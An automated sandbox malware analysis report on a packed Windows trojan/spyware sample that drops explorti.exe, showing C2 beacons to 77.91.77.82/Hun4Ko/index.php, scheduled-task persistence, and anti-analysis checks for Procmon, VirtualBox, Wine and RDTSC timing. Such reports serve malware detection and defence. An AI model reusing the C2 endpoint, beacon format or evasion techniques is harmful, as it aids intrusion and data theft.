                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: Joe Sandbox View IP Address: 77.91.77.82
                    Source: Joe Sandbox View ASN Name: FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU
                    Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.82
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 7_2_00E9BD30 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,7_2_00E9BD30
                    Source: unknownHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: explorti.exe, 00000007.00000002.2880581504.00000000006FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.php
                    Source: explorti.exe, 00000007.00000002.2880581504.00000000006BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php
                    Source: explorti.exe, 00000007.00000002.2880581504.00000000006FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.php02k02k02k02k02k02k
                    Source: explorti.exe, 00000007.00000002.2880581504.00000000006BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpC
                    Source: explorti.exe, 00000007.00000002.2880581504.00000000006BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpM
                    Source: explorti.exe, 00000007.00000002.2880581504.00000000006FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpT
                    Source: explorti.exe, 00000007.00000002.2880581504.00000000006BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpW
                    Source: explorti.exe, 00000007.00000002.2880581504.00000000006BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpa
                    Source: explorti.exe, 00000007.00000002.2880581504.00000000006FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpft
                    Source: explorti.exe, 00000007.00000002.2880581504.00000000006BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpk
                    Source: explorti.exe, 00000007.00000002.2880581504.00000000006BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpu

                    System Summary

                    Source: gNo9ad9KO4.exeStatic PE information: section name:
                    Source: gNo9ad9KO4.exeStatic PE information: section name: .idata
                    Source: gNo9ad9KO4.exeStatic PE information: section name:
                    Source: explorti.exe.0.drStatic PE information: section name:
                    Source: explorti.exe.0.drStatic PE information: section name: .idata
                    Source: explorti.exe.0.drStatic PE information: section name:
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe File created: C:\Windows\Tasks\explorti.job
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 7_2_00E94CD07_2_00E94CD0
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 7_2_00ED30487_2_00ED3048
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 7_2_00E9E9B07_2_00E9E9B0
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 7_2_00EC7D637_2_00EC7D63
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 7_2_00ED6EE97_2_00ED6EE9
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 7_2_00E94AD07_2_00E94AD0
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 7_2_00ED763B7_2_00ED763B
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 7_2_00ED2BB07_2_00ED2BB0
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 7_2_00ED775B7_2_00ED775B
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 7_2_00ED87007_2_00ED8700
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: String function: 00EA7840 appears 32 times
                    Source: gNo9ad9KO4.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: gNo9ad9KO4.exeStatic PE information: Section: ZLIB complexity 0.9984631147540983
                    Source: gNo9ad9KO4.exeStatic PE information: Section: adkjkfkz ZLIB complexity 0.9944319686081694
                    Source: explorti.exe.0.drStatic PE information: Section: ZLIB complexity 0.9984631147540983
                    Source: explorti.exe.0.drStatic PE information: Section: adkjkfkz ZLIB complexity 0.9944319686081694
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/3@0/1
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe File created: C:\Users\user\AppData\Local\Temp\ad40971b6b
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe File read: C:\Users\desktop.ini
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: gNo9ad9KO4.exeVirustotal: Detection: 51%
                    Source: gNo9ad9KO4.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: explorti.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe File read: C:\Users\user\Desktop\gNo9ad9KO4.exe
                    Source: unknownProcess created: C:\Users\user\Desktop\gNo9ad9KO4.exe "C:\Users\user\Desktop\gNo9ad9KO4.exe"
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeProcess created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: winmm.dll
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: wininet.dll
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: mstask.dll
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: mpr.dll
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: dui70.dll
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: duser.dll
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: chartv.dll
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: oleacc.dll
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: atlthunk.dll
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: textinputframework.dll
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: coreuicomponents.dll
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: coremessaging.dll
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: ntmarta.dll
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: wintypes.dll
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: wtsapi32.dll
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: winsta.dll
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: textshaping.dll
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: propsys.dll
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: windows.fileexplorer.common.dll
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: iertutil.dll
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: profapi.dll
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: edputil.dll
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: urlmon.dll
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: srvcli.dll
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: netutils.dll
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: appresolver.dll
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: bcp47langs.dll
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: slc.dll
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: userenv.dll
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: sppc.dll
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: explorerframe.dll
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: netutils.dll
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32
                    Source: gNo9ad9KO4.exeStatic file information: File size 1894912 > 1048576
                    Source: gNo9ad9KO4.exeStatic PE information: Raw size of adkjkfkz is bigger than: 0x100000 < 0x19d200

                    Data Obfuscation

                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeUnpacked PE file: 0.2.gNo9ad9KO4.exe.160000.0.unpack :EW;.rsrc:W;.idata :W; :EW;adkjkfkz:EW;afyvsewm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;adkjkfkz:EW;afyvsewm:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeUnpacked PE file: 1.2.explorti.exe.e90000.0.unpack :EW;.rsrc:W;.idata :W; :EW;adkjkfkz:EW;afyvsewm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;adkjkfkz:EW;afyvsewm:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeUnpacked PE file: 2.2.explorti.exe.e90000.0.unpack :EW;.rsrc:W;.idata :W; :EW;adkjkfkz:EW;afyvsewm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;adkjkfkz:EW;afyvsewm:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeUnpacked PE file: 7.2.explorti.exe.e90000.0.unpack :EW;.rsrc:W;.idata :W; :EW;adkjkfkz:EW;afyvsewm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;adkjkfkz:EW;afyvsewm:EW;.taggant:EW;
                    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                    Source: explorti.exe.0.drStatic PE information: real checksum: 0x1d691a should be: 0x1d810c
                    Source: gNo9ad9KO4.exeStatic PE information: real checksum: 0x1d691a should be: 0x1d810c
                    Source: gNo9ad9KO4.exeStatic PE information: section name:
                    Source: gNo9ad9KO4.exeStatic PE information: section name: .idata
                    Source: gNo9ad9KO4.exeStatic PE information: section name:
                    Source: gNo9ad9KO4.exeStatic PE information: section name: adkjkfkz
                    Source: gNo9ad9KO4.exeStatic PE information: section name: afyvsewm
                    Source: gNo9ad9KO4.exeStatic PE information: section name: .taggant
                    Source: explorti.exe.0.drStatic PE information: section name:
                    Source: explorti.exe.0.drStatic PE information: section name: .idata
                    Source: explorti.exe.0.drStatic PE information: section name:
                    Source: explorti.exe.0.drStatic PE information: section name: adkjkfkz
                    Source: explorti.exe.0.drStatic PE information: section name: afyvsewm
                    Source: explorti.exe.0.drStatic PE information: section name: .taggant
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 7_2_00EAD82C push ecx; ret 7_2_00EAD83F
                    Source: gNo9ad9KO4.exeStatic PE information: section name: entropy: 7.988500981589288
                    Source: gNo9ad9KO4.exeStatic PE information: section name: adkjkfkz entropy: 7.953327902515579
                    Source: explorti.exe.0.drStatic PE information: section name: entropy: 7.988500981589288
                    Source: explorti.exe.0.drStatic PE information: section name: adkjkfkz entropy: 7.953327902515579
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe File created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

                    Boot Survival

                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Window searched: window name: FilemonClass
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Window searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Window searched: window name: RegmonClass
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: Regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: Filemonclass
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe File created: C:\Windows\Tasks\explorti.job
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe File opened: HKEY_CURRENT_USER\Software\Wine
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3403A2 second address: 3403AC instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4688C1B766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3403AC second address: 3403B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3403B1 second address: 3403B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3403B7 second address: 3403F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F4688C929D8h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 mov ecx, dword ptr [ebp+122D3C04h] 0x0000002a push 00000000h 0x0000002c mov dh, 62h 0x0000002e push D0F05AC1h 0x00000033 push ecx 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3403F9 second address: 340480 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a add dword ptr [esp], 2F0FA5BFh 0x00000011 sub si, 5E7Ah 0x00000016 push 00000003h 0x00000018 add dword ptr [ebp+122D36A9h], edx 0x0000001e push 00000000h 0x00000020 push esi 0x00000021 push ecx 0x00000022 mov dx, di 0x00000025 pop ecx 0x00000026 pop edi 0x00000027 push 00000003h 0x00000029 push 59A1D9F2h 0x0000002e jmp 00007F4688C1B770h 0x00000033 add dword ptr [esp], 665E260Eh 0x0000003a mov edx, dword ptr [ebp+122D3AB8h] 0x00000040 lea ebx, dword ptr [ebp+1244502Ch] 0x00000046 push esi 0x00000047 jmp 00007F4688C1B772h 0x0000004c pop ecx 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 js 00007F4688C1B777h 0x00000056 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 361403 second address: 361409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 361409 second address: 36140F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 36140F second address: 361424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c push esi 0x0000000d jne 00007F4688C929D6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 32A50D second address: 32A52D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F4688C1B76Ch 0x0000000e jnc 00007F4688C1B766h 0x00000014 jg 00007F4688C1B76Ch 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 32A52D second address: 32A543 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4688C929E2h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 35F3FA second address: 35F3FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 35F3FE second address: 35F40A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F4688C929D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 35F56D second address: 35F57A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 35F6D7 second address: 35F6DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 35F6DF second address: 35F6E9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 35FB1A second address: 35FB1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 35FB1E second address: 35FB22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 35FB22 second address: 35FB28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3602E5 second address: 3602EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3602EC second address: 3602F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 35737C second address: 3573B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Ah 0x00000007 push esi 0x00000008 jmp 00007F4688C1B776h 0x0000000d jo 00007F4688C1B766h 0x00000013 pop esi 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 push edi 0x00000018 jnp 00007F4688C1B766h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3605C1 second address: 3605C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3605C7 second address: 3605CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3605CB second address: 3605CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3605CF second address: 3605F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4688C1B779h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
